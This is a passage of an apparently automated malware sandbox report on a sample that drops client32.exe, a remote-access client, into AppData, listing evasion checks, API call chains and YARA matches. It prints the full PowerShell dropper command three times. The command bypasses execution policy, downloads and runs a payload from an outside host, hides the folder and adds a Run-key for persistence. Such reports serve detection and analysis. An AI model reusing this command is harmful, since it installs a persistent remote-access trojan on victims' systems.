                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3285Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6584Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeWindow / User API: threadDelayed 425Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeWindow / User API: threadDelayed 7985Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\GRDCWLLI20\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\GRDCWLLI20\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_3-56463
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-52775
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeAPI coverage: 7.8 %
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeAPI coverage: 2.8 %
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe TID: 7636Thread sleep time: -69500s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe TID: 7640Thread sleep time: -42500s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe TID: 7636Thread sleep time: -1996250s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,3_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,3_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,3_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,3_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,3_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,FindCloseChangeNotification,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102D900
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,7_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1110BD70 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,7_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,7_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,7_2_1106ABD0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: client32.exeBinary or memory string: VMware
                                Source: powershell.exe, 00000001.00000002.1881774532.00000170D2A59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: client32.exeBinary or memory string: VMWare
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeAPI call chain: ExitProcess graph end nodegraph_3-53023
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_11162BB7
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,3_2_110B7F30
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,InternetQueryDataAvailable,SetLastError,GetProcAddress,SetLastError,FreeLibrary,3_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,3_2_1117D104
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,3_2_110934A0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,3_2_11031780
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,7_2_110934A0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,7_2_11031780
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_11162BB7
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_1116EC49
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError,7_2_110F4990
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11113190 GetKeyState,DeviceIoControl,keybd_event,3_2_11113190
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe "C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe" Jump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $hgwcfvipunw='http://dfwreds.com/data.php?14991';$azewtjmsl=(new-object system.net.webclient).downloadstring($hgwcfvipunw);$qepgekusqfv=[system.convert]::frombase64string($azewtjmsl);$asd = get-random -minimum -10 -maximum 37; $liedxzvhuh=[system.environment]::getfolderpath('applicationdata')+'\grdcwlli'+$asd;if (!(test-path $liedxzvhuh -pathtype container)) { new-item -path $liedxzvhuh -itemtype directory };$p=join-path $liedxzvhuh 'tttt.zip';[system.io.file]::writeallbytes($p,$qepgekusqfv);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$liedxzvhuh)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $liedxzvhuh 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $liedxzvhuh -force; $fd.attributes='hidden';$s=$liedxzvhuh+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='hqwqto';$ds='string';new-itemproperty -path $k -name $v -value $s -propertytype $ds;
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $hgwcfvipunw='http://dfwreds.com/data.php?14991';$azewtjmsl=(new-object system.net.webclient).downloadstring($hgwcfvipunw);$qepgekusqfv=[system.convert]::frombase64string($azewtjmsl);$asd = get-random -minimum -10 -maximum 37; $liedxzvhuh=[system.environment]::getfolderpath('applicationdata')+'\grdcwlli'+$asd;if (!(test-path $liedxzvhuh -pathtype container)) { new-item -path $liedxzvhuh -itemtype directory };$p=join-path $liedxzvhuh 'tttt.zip';[system.io.file]::writeallbytes($p,$qepgekusqfv);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$liedxzvhuh)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $liedxzvhuh 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $liedxzvhuh -force; $fd.attributes='hidden';$s=$liedxzvhuh+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='hqwqto';$ds='string';new-itemproperty -path $k -name $v -value $s -propertytype $ds;Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1109E5B0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,3_2_1109E5B0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,3_2_1109ED30
                                Source: client32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: client32.exe, client32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Shell_TrayWnd
                                Source: client32.exe, client32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Progman
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_11174898
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_11174B29
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,3_2_11174BCC
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: GetLocaleInfoA,3_2_1116C24E
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_11174796
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_111746A1
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,7_2_11174BCC
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: GetLocaleInfoA,7_2_1116C24E
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,7_2_11174796
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_111746A1
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,7_2_1117483D
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,7_2_11174898
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_11174B29
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_11174B90
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,7_2_11174A69
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,3_2_110F37A0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11134830 GetLocalTime,LoadLibraryA,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcessHandleCount,SetLastError,GetProcAddress,GetProcAddress,SetLastError,SetLastError,GetProcAddress,K32GetProcessMemoryInfo,SetLastError,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,3_2_11134830
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1103BA70 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,3_2_1103BA70
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1117594C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,3_2_1117594C
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11145C70 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,3_2_11145C70
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,3_2_11070430
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,7_2_11070430
                                Source: Yara matchFile source: 8.2.client32.exe.73a90000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.73a90000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.0.client32.exe.950000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.6f290000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.powershell.exe.170baed8fc8.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.powershell.exe.170baeced60.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.powershell.exe.170baeb84c0.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.6f290000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.73a90000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.950000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.0.client32.exe.950000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.client32.exe.6f290000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.6f120000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.client32.exe.950000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.0.client32.exe.950000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.950000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000007.00000002.1909048492.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000000.1986528123.0000000000952000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
